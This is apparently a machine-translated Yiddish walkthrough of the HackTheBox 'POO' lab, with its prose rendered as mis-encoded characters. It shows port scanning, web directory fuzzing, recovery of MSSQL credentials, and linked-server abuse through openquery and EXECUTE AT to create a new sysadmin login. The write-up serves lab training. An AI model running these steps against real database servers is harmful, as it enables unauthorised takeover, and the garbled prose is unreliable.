HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื™ืŸ ื“ืขื ืึทืจื˜ื™ืงืœ ืžื™ืจ ื•ื•ืขืœืŸ ืคื•ื ืึทื ื“ืขืจืงืœื™ื™ึทื‘ืŸ ื“ื™ ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื ื™ื˜ ื‘ืœื•ื™ื– ืึท ืžืึทืฉื™ืŸ, ืึธื‘ืขืจ ืึท ื’ืึทื ืฅ ืžื™ื ื™-ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคื•ืŸ โ€‹โ€‹ื“ืขื ืคึผืœืึทืฅ HackTheBox.

ื•ื•ื™ ืกื˜ื™ื™ื˜ื™ื“ ืื™ืŸ ื“ื™ ื‘ืึทืฉืจื™ื™ึทื‘ื•ื ื’, POO ืื™ื– ื“ื™ื–ื™ื™ื ื“ ืฆื• ืคึผืจื•ื‘ื™ืจืŸ ืกืงื™ืœื– ืื™ืŸ ืึทืœืข ืกื˜ืึทื’ืขืก ืคื•ืŸ ืื ืคืืœืŸ ืื™ืŸ ืึท ืงืœื™ื™ืŸ ืึทืงื˜ื™ื•ื• Directory ืกื•ื•ื™ื•ื•ืข. ื“ืขืจ ืฆื™ืœ ืื™ื– ืฆื• ืงืึธืžืคึผืจืึธืžื™ืก ืึท ืฆื•ื˜ืจื™ื˜ืœืขืš ื‘ืึทืœืขื‘ืึธืก, ืขืกืงืึทืœื™ื™ื˜ ืคึผืจื™ื•ื•ื™ืœืึทื“ื–ืฉืึทื– ืื•ืŸ ืœืขืกืึธืฃ ืงืึธืžืคึผืจืึธืžื™ืก ื“ื™ ื’ืื ืฆืข ืคืขืœื“ ื‘ืฉืขืช ืงืึทืœืขืงื˜ื™ื ื’ 5 ืคืœืึทื’ืก.

ืคึฟืึทืจื‘ื™ื ื“ื•ื ื’ ืฆื• ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืื™ื– ื“ื•ืจืš ื•ื•ืคึผืŸ. ืขืก ืื™ื– ืจืขืงืึทืžืขื ื“ื™ื“ ื ื™ืฉื˜ ืฆื• ืคืึทืจื‘ื™ื ื“ืŸ ืคึฟื•ืŸ ืึท ืึทืจื‘ืขื˜ ืงืึธืžืคึผื™ื•ื˜ืขืจ ืึธื“ืขืจ ืคึฟื•ืŸ ืึท ื‘ืึทืœืขื‘ืึธืก ื•ื•ื• ืขืก ื–ืขื ืขืŸ ื•ื•ื™ื›ื˜ื™ืง ื“ืึทื˜ืŸ ืคึฟืึทืจ ืื™ืจ, ื•ื•ื™ื™ึทืœ ืื™ืจ ืขื ื“ื™ืงืŸ ื–ื™ืš ืื•ื™ืฃ ืึท ืคึผืจื™ื•ื•ืึทื˜ ื ืขืฅ ืžื™ื˜ ืžืขื ื˜ืฉืŸ ื•ื•ืึธืก ื•ื•ื™ืกืŸ ืขืคึผืขืก ืื™ืŸ ื“ื™ ืคืขืœื“ ืคื•ืŸ ืื™ื ืคึฟืึธืจืžืึทืฆื™ืข ื–ื™ื›ืขืจื”ื™ื™ื˜ :)

ืึธืจื’ืึทื ืึทื–ื™ื™ืฉืึทื ืึทืœ ืื™ื ืคึฟืึธืจืžืึทืฆื™ืข
ืฆื• ื”ืขืœืคืŸ ืื™ืจ ื‘ืœื™ื™ื‘ืŸ ื“ืขืจื”ื™ื™ึทื ื˜ื™ืงื˜ ืžื™ื˜ ื ื™ื™ึทืข ืึทืจื˜ื™ืงืœืขืŸ, ื•ื•ื™ื™ื›ื•ื•ืืจื’ ืื•ืŸ ืื ื“ืขืจืข ืื™ื ืคึฟืึธืจืžืึทืฆื™ืข, ืื™ืš ื”ืึธื‘ืŸ ื‘ืืฉืืคืŸ ื˜ืขืœืขื’ืจืึทื ืงืึทื ืึทืœ ะธ ื’ืจื•ืคึผืข ืฆื• ื“ื™ืกืงื•ื˜ื™ืจืŸ ืงื™ื™ืŸ ื™ืฉื•ื– ืื™ืŸ ื“ื™ ืคืขืœื“ ืคื•ืŸ I&KB. ืื•ื™ืš ื“ื™ื™ืŸ ืคืขืจื–ืขื ืœืขื›ืข ืจื™ืงื•ื•ืขืก, ืคึฟืจืื’ืŸ, ืคึฟื™ืจืœื™ื™ื’ืŸ ืื•ืŸ ืจืขืงืึทืžืึทื ื“ื™ื™ืฉืึทื ื– ืื™ืš ื•ื•ืขืœ ืคึผืขืจืกื ืึทืœื™ ืงื•ืงืŸ ืื™ืŸ ืขืก ืื•ืŸ ืขื ื˜ืคึฟืขืจืŸ ืฆื• ืึทืœืขืžืขืŸ..

ื›ืœ ืื™ื ืคึฟืึธืจืžืึทืฆื™ืข ืื™ื– ื“ืขืจืœืื ื’ื˜ ื‘ืœื•ื™ื– ืคึฟืึทืจ ื‘ื™ืœื“ื•ื ื’ืงืจื™ื™ื– ืฆื•ื•ืขืงืŸ. ื“ืขืจ ืžื—ื‘ืจ ืคื•ืŸ ื“ืขื ื“ืึธืงื•ืžืขื ื˜ ื˜ื•ื˜ ื ื™ืฉื˜ ืึธื ื ืขืžืขืŸ ืงื™ื™ืŸ ืคึฟืึทืจืึทื ื˜ื•ื•ืึธืจื˜ืœืขื›ืงื™ื™ื˜ ืคึฟืึทืจ ืงื™ื™ืŸ ืฉืขื“ื™ืงืŸ ื’ืขืคึฟื™ืจื˜ ืฆื• ื•ื•ืขืจ ืขืก ื™ื– ื•ื•ื™ ืึท ืจืขื–ื•ืœื˜ืึทื˜ ืคื•ืŸ ื“ื™ ื ื•ืฆืŸ ืคื•ืŸ ื•ื•ื™ืกืŸ ืื•ืŸ ื˜ืขืงื ื™ืงืก ื‘ืืงื•ืžืขืŸ ืคื•ืŸ ืœืขืจื ืขืŸ ื“ืขื ื“ืึธืงื•ืžืขื ื˜.

ื™ื ื˜ืจืึธ

ื“ืขืจ ืกื•ืฃ ืฉืคึผื™ืœ ื‘ืืฉื˜ื™ื™ื˜ ืคื•ืŸ ืฆื•ื•ื™ื™ ืžืืฉื™ื ืขืŸ, ืื•ืŸ ื›ึผื•ืœืœ 5 ืคืœืึทื’ืก.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ื ื‘ืึทืฉืจื™ื™ึทื‘ื•ื ื’ ืื•ืŸ ืึทื“ืจืขืก ืคื•ืŸ ื“ื™ ื‘ื ื™ืžืฆื ื‘ืึทืœืขื‘ืึธืก ืื™ื– ืื•ื™ืš ื’ืขื’ืขื‘ืŸ.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ื–ืืœ ืก ื‘ืึทืงื•ืžืขืŸ ืกื˜ืึทืจื˜ืขื“!

ืจืขืงืึธืŸ ืคืึธืŸ

ื“ืขืจ ืžืึทืฉื™ืŸ ื”ืื˜ ืึทืŸ IP ืึทื“ืจืขืก ืคื•ืŸ 10.13.38.11, ื•ื•ืึธืก ืื™ืš ืœื™ื™ื’ืŸ ืฆื• /etc/hosts.
10.13.38.11 poo.htb

ืขืจืฉื˜ืขืจ ืคื•ืŸ ืึทืœืข, ืžื™ืจ ื™ื‘ืขืจืงื•ืงืŸ ืขืคืขื ืขืŸ ืคึผืึธืจืฅ. ื–ื™ื ื˜ ืกืงืึทื ื™ื ื’ ืึทืœืข ืคึผืึธืจืฅ ืžื™ื˜ nmap ื ืขืžื˜ ืึท ืœืึทื ื’ ืฆื™ื™ึทื˜, ืื™ืš ื•ื•ืขืœ ืขืจืฉื˜ืขืจ ื˜ืึธืŸ ื“ืึธืก ืžื™ื˜ ืžืึทืกืกืงืึทืŸ. ืžื™ืจ ื™ื‘ืขืจืงื•ืงืŸ ืึทืœืข TCP ืื•ืŸ UDP ืคึผืึธืจืฅ ืคึฟื•ืŸ ื“ื™ tun0 ืฆื•ื‘ื™ื ื“ ืžื™ื˜ ืึท ื’ื™ื›ืงื™ื™ึทื˜ ืคื•ืŸ 500 ืคึผืึทืงื™ืฅ ืคึผืขืจ ืกืขืงื•ื ื“ืข.

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื™ืฆื˜, ืฆื• ื‘ืึทืงื•ืžืขืŸ ืžืขืจ ื“ื™ื˜ื™ื™ืœื“ ืื™ื ืคึฟืึธืจืžืึทืฆื™ืข ื•ื•ืขื’ืŸ ื“ื™ ืกืขืจื•ื•ื™ืกืขืก ื•ื•ืึธืก ืœื•ื™ืคืŸ ืื•ื™ืฃ ื“ื™ ืคึผืึธืจืฅ, ืœืึธื–ืŸ ืื•ื ื“ื– ื™ื‘ืขืจืงื•ืงืŸ ืžื™ื˜ ื“ื™ -A ืึธืคึผืฆื™ืข.

nmap -A poo.htb -p80,1433

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืึทื–ื•ื™ ืžื™ืจ ื”ืึธื‘ืŸ IIS ืื•ืŸ MSSQL ื‘ืึทื“ื™ื ื•ื ื’ืก. ืื™ืŸ ื“ืขื ืคืึทืœ, ืžื™ืจ ื•ื•ืขืœืŸ ื’ืขืคึฟื™ื ืขืŸ ื“ื™ ืคืึทืงื˜ื™ืฉ ื“ื ืก ื ืึธืžืขืŸ ืคื•ืŸ ื“ื™ ืคืขืœื“ ืื•ืŸ ืงืึธืžืคึผื™ื•ื˜ืขืจ. ืื•ื™ืฃ ื“ื™ ื•ื•ืขื‘ ืกืขืจื•ื•ืขืจ ืžื™ืจ ื–ืขื ืขืŸ ื‘ืึทื’ืจื™ืกืŸ ื“ื•ืจืš ื“ื™ IIS ื”ื™ื™ื ื‘ืœืึทื˜.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ื–ืืœ ืก ื’ื™ื™ืŸ ื“ื•ืจืš ื“ื™ ื“ื™ืจืขืงื˜ืขืจื™ื–. ืื™ืš ื ื•ืฆืŸ ื’ืึธื‘ื•ืกื˜ืขืจ ืคึฟืึทืจ ื“ืขื. ืื™ืŸ ื“ื™ ืคึผืึทืจืึทืžืขื˜ืขืจืก ืžื™ืจ ืึธื ื•ื•ื™ื™ึทื–ืŸ ื“ื™ ื ื•ืžืขืจ ืคื•ืŸ ืคึฟืขื“ืขื 128 (-ื˜), URL (-ื•), ื•ื•ืขืจื˜ืขืจื‘ื•ืš (-ื•ื•) ืื•ืŸ ื™ืงืกื˜ืขื ืฉืึทื ื– ื•ื•ืึธืก ืื™ื ื˜ืขืจืขืก ืื•ื ื“ื– (-ืจืขื ื˜ื’ืขื ).

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ื“ืึธืก ื’ื™ื˜ ืื•ื ื“ื– ื”ื˜ื˜ืคึผ ืึธื˜ืขื ื˜ืึทืงื™ื™ืฉืึทืŸ ืคึฟืึทืจ ื“ื™ / ืึทื“ืžื™ืŸ ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ, ื•ื•ื™ ื’ืขื–ื•ื ื˜ ื•ื•ื™ ืึท ืฆื•ื˜ืจื™ื˜ืœืขืš ื“ืขืกืงื˜ืึทืคึผ ื“ื™ื ืกื˜ .DS_Store ื˜ืขืงืข. .DS_Store ื–ืขื ืขืŸ ื˜ืขืงืขืก ื•ื•ืึธืก ืงืจืึธื ืžื ื”ื’ ืกืขื˜ื˜ื™ื ื’ืก ืคึฟืึทืจ ืึท ื˜ืขืงืข, ืึทื–ืึท ื•ื•ื™ ืึท ืจืฉื™ืžื” ืคื•ืŸ ื˜ืขืงืขืก, ื™ื™ืงืึทืŸ ืœืึธื•ืงื™ื™ืฉืึทื ื– ืื•ืŸ ื“ื™ ืื•ื™ืกื’ืขืงืœื™ื‘ืŸ ื”ื™ื ื˜ืขืจื’ืจื•ื ื˜ ื‘ื™ืœื“. ืึทื–ืึท ืึท ื˜ืขืงืข ืงืขืŸ ืกื•ืฃ ืึทืจื•ื™ืฃ ืื™ืŸ ื“ื™ ื•ื•ืขื‘ ืกืขืจื•ื•ืขืจ ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ ืคื•ืŸ ื•ื•ืขื‘ ื“ืขื•ื•ืขืœืึธืคึผืขืจืก. ืื™ืŸ ื“ืขื ื•ื•ืขื’ ืžื™ืจ ื‘ืึทืงื•ืžืขืŸ ืื™ื ืคึฟืึธืจืžืึทืฆื™ืข ื•ื•ืขื’ืŸ ื“ื™ ืื™ื ื”ืึทืœื˜ ืคื•ืŸ ื“ื™ ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ. ืคึฟืึทืจ ื“ืขื ืื™ืจ ืงืขื ืขืŸ ื ื•ืฆืŸ DS_Store ืงืจื™ื›ืขืจ.

python3 dsstore_crawler.py -i http://poo.htb/

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืžื™ืจ ื‘ืึทืงื•ืžืขืŸ ื“ื™ ืื™ื ื”ืึทืœื˜ ืคื•ืŸ ื“ื™ ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ. ื“ื™ ืžืขืจืกื˜ ื˜ืฉื™ืงืึทื•ื•ืข ื–ืึทืš ื“ืึธ ืื™ื– ื“ื™ / dev ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ, ืคึฟื•ืŸ ื•ื•ืึธืก ืžื™ืจ ืงืขื ืขืŸ ืงื•ืงืŸ ืื™ืŸ ื“ื™ ืงื•ื•ืืœืŸ ืื•ืŸ ื“ื‘ ื˜ืขืงืขืก ืื™ืŸ ืฆื•ื•ื™ื™ ืฆื•ื•ื™ื™ื’ืŸ. ืึธื‘ืขืจ ืžื™ืจ ืงืขื ืขืŸ ื ื•ืฆืŸ ื“ื™ ืขืจืฉื˜ืขืจ 6 ืื•ืชื™ื•ืช ืคื•ืŸ ื˜ืขืงืข ืื•ืŸ ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ ื ืขืžืขืŸ ืื•ื™ื‘ ื“ื™ ืกืขืจื•ื•ื™ืก ืื™ื– ืฉืคึผื™ืจืขื•ื•ื“ื™ืง ืฆื• IIS ShortName. ืื™ืจ ืงืขื ืขืŸ ืงืึธื ื˜ืจืึธืœื™ืจืŸ ืคึฟืึทืจ ื“ืขื ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™ ื ื™ืฆืŸ IIS ืงื•ืจืฅ ื ืึธืžืขืŸ ืกืงืึทื ื ืขืจ.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื•ืŸ ืžื™ืจ ื’ืขืคึฟื™ื ืขืŸ ืื™ื™ืŸ ื˜ืขืงืกื˜ ื˜ืขืงืข ื•ื•ืึธืก ืกื˜ืึทืจืฅ ืžื™ื˜ "ืคึผืึธืึธ_ืงืึธ". ื ื™ื˜ ื’ืขื•ื•ืื•ืกื˜ ื•ื•ืึธืก ืฆื• ื˜ืึธืŸ ื•ื•ื™ื™ึทื˜ืขืจ, ืื™ืš ืคืฉื•ื˜ ืื•ื™ืกื’ืขืงืœื™ื‘ืŸ ืึทืœืข ื“ื™ ื•ื•ืขืจื˜ืขืจ ืกื˜ืึทืจื˜ื™ื ื’ ืžื™ื˜ "ืงืึธ" ืคื•ืŸ ื“ื™ ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ ื•ื•ืขืจื˜ืขืจื‘ื•ืš.

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

ืื•ืŸ ืžื™ืจ ื•ื•ืขืœืŸ ืกืึธืจื˜ ืขืก ืื•ื™ืก ืžื™ื˜ wfuzz.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื•ืŸ ืžื™ืจ ื’ืขืคึฟื™ื ืขืŸ ื“ื™ ืจืขื›ื˜ ื•ื•ืึธืจื˜! ืžื™ืจ ืงื•ืงืŸ ืื™ืŸ ื“ืขื ื˜ืขืงืข, ืจืึทื˜ืขื•ื•ืขืŸ ื“ื™ ืงืจืึทื“ืขื ื˜ืฉืึทืœื– (ืœื•ื™ื˜ ื“ื™ DBNAME ืคึผืึทืจืึทืžืขื˜ืขืจ, ื–ื™ื™ ื–ืขื ืขืŸ ืคึฟื•ืŸ MSSQL).

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืžื™ืจ ืึทืจื•ื™ืกื’ืขื‘ืŸ ื“ื™ ืคืึธืŸ ืื•ืŸ ืžื™ืจ ืฉื˜ื™ื™ึทื’ืŸ 20%.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ื”ื ืคืึธืŸ

ืžื™ืจ ืคืึทืจื‘ื™ื ื“ืŸ ืฆื• MSSQL, ืื™ืš ื ื•ืฆืŸ DBeaver.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืžื™ืจ ื˜ืึธืŸ ื ื™ื˜ ื’ืขืคึฟื™ื ืขืŸ ืขืคึผืขืก ื˜ืฉื™ืงืึทื•ื•ืข ืื™ืŸ ื“ืขื ื“ืึทื˜ืึทื‘ื™ื™ืก, ืœืึธื–ืŸ ืื•ื ื“ื– ืฉืึทืคึฟืŸ ืึท ืกืงืœ ืขื“ื™ื˜ืึธืจ ืื•ืŸ ืงืึธื ื˜ืจืึธืœื™ืจืŸ ื•ื•ืึธืก ื ื™ืฆืขืจืก ืขืก ื–ืขื ืขืŸ.

SELECT name FROM master..syslogins;

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืžื™ืจ ื”ืึธื‘ืŸ ืฆื•ื•ื™ื™ ื ื™ืฆืขืจืก. ืœืึธืžื™ืจ ืงืึธื ื˜ืจืึธืœื™ืจืŸ ืื•ื ื“ื–ืขืจ ืคึผืจื™ื•ื•ื™ืœืึทื“ื–ืฉืึทื–.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื–ื•ื™, ืขืก ื–ืขื ืขืŸ ืงื™ื™ืŸ ืคึผืจื™ื•ื•ื™ืœืึทื“ื–ืฉืึทื–. ื–ืืœ ืก ืงื•ืง ืื™ืŸ ืœื™ื ื’ืงื˜ ืกืขืจื•ื•ืขืจืก, ืื™ืš ื’ืขืฉืจื™ื‘ืŸ ื•ื•ืขื’ืŸ ื“ืขื ื˜ืขื›ื ื™ืง ืื™ืŸ ื“ืขื˜ืึทืœ ื“ืึธ.

SELECT * FROM master..sysservers;

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ื“ืึธืก ืื™ื– ื•ื•ื™ ืžื™ืจ ื’ืขืคึฟื™ื ืขืŸ ืืŸ ืื ื“ืขืจ SQL ืกืขืจื•ื•ื™ืจืขืจ. ืœืึธืžื™ืจ ืคึผืจื•ื‘ื™ืจืŸ ื“ื™ ื“ื•ืจื›ืคื™ืจื•ื ื’ ืคื•ืŸ ืงืึทืžืึทื ื“ื– ืื•ื™ืฃ ื“ืขื ืกืขืจื•ื•ืขืจ ื ื™ืฆืŸ ืึธืคึผืขื ืงื•ื•ืขืจื™ ().

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื•ืŸ ืžื™ืจ ืงืขื ืขืŸ ืืคื™ืœื• ื‘ื•ื™ืขืŸ ืึท ืึธื ืคึฟืจืขื’ ื‘ื•ื™ื.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

ื“ื™ ืคื•ื ื˜ ืื™ื– ืึทื– ื•ื•ืขืŸ ืžื™ืจ ืžืึทื›ืŸ ืึท ื‘ืงืฉื” ืฆื• ืึท ืœื™ื ื’ืงื˜ ืกืขืจื•ื•ืขืจ, ื“ื™ ื‘ืขื˜ืŸ ืื™ื– ืขืงืกืึทืงื™ื•ื˜ืึทื“ ืื™ืŸ ื“ืขื ืงืึธื ื˜ืขืงืกื˜ ืคื•ืŸ ืืŸ ืื ื“ืขืจ ื‘ืึทื ื™ืฆืขืจ! ืœืึธืžื™ืจ ื–ืขืŸ ืื™ืŸ ื“ืขื ืงืึธื ื˜ืขืงืกื˜ ืคื•ืŸ ื•ื•ืึธืก ื‘ืึทื ื™ืฆืขืจ ืžื™ืจ ืึทืจื‘ืขื˜ืŸ ืื•ื™ืฃ ืึท ืœื™ื ื’ืงื˜ ืกืขืจื•ื•ืขืจ.

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื™ืฆื˜ ืœืึธืžื™ืจ ื–ืขืŸ ืื™ืŸ ื•ื•ืึธืก ืงืึธื ื˜ืขืงืกื˜ ืึท ื‘ืงืฉื” ืื™ื– ื’ืขืžืื›ื˜ ืคื•ืŸ ืึท ืœื™ื ื’ืงื˜ ืกืขืจื•ื•ืขืจ ืฆื• ืื•ื ื“ื–ืขืจ!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืึทื–ื•ื™ ืขืก ืื™ื– ื“ื™ DBO ืงืึธื ื˜ืขืงืกื˜ ื•ื•ืึธืก ื–ืึธืœ ื”ืึธื‘ืŸ ืึทืœืข ื“ื™ ืคึผืจื™ื•ื•ื™ืœืึทื“ื–ืฉืึทื–. ืœืึธืžื™ืจ ืงืึธื ื˜ืจืึธืœื™ืจืŸ ื“ื™ ืคึผืจื™ื•ื•ื™ืœืึทื“ื–ืฉืึทื– ืื™ืŸ ืคืึทืœ ืคื•ืŸ ืึท ื‘ืงืฉื” ืคื•ืŸ ืึท ืœื™ื ื’ืงื˜ ืกืขืจื•ื•ืขืจ.

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ื•ื•ื™ ืื™ืจ ืงืขื ืขืŸ ื–ืขืŸ, ืžื™ืจ ื”ืึธื‘ืŸ ืึทืœืข ื“ื™ ืคึผืจื™ื•ื•ื™ืœืึทื“ื–ืฉืึทื–! ืœืึธืžื™ืจ ืžืึทื›ืŸ ืื•ื ื“ื–ืขืจ ืื™ื™ื’ืขื ืข ืึทื“ืžื™ื ื™ืกื˜ืจืึทื˜ืึธืจ ื•ื•ื™ ื“ืึธืก. ืึธื‘ืขืจ ื–ื™ื™ ื˜ืึธืŸ ื ื™ื˜ ืœืึธื–ืŸ ืขืก ื“ื•ืจืš ืึธืคึผืขื ืงื•ื•ืขืจื™, ืœืึธื–ืŸ ืื•ื ื“ื– ื˜ืึธืŸ ื“ืึธืก ื“ื•ืจืš EXECUTE AT.

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

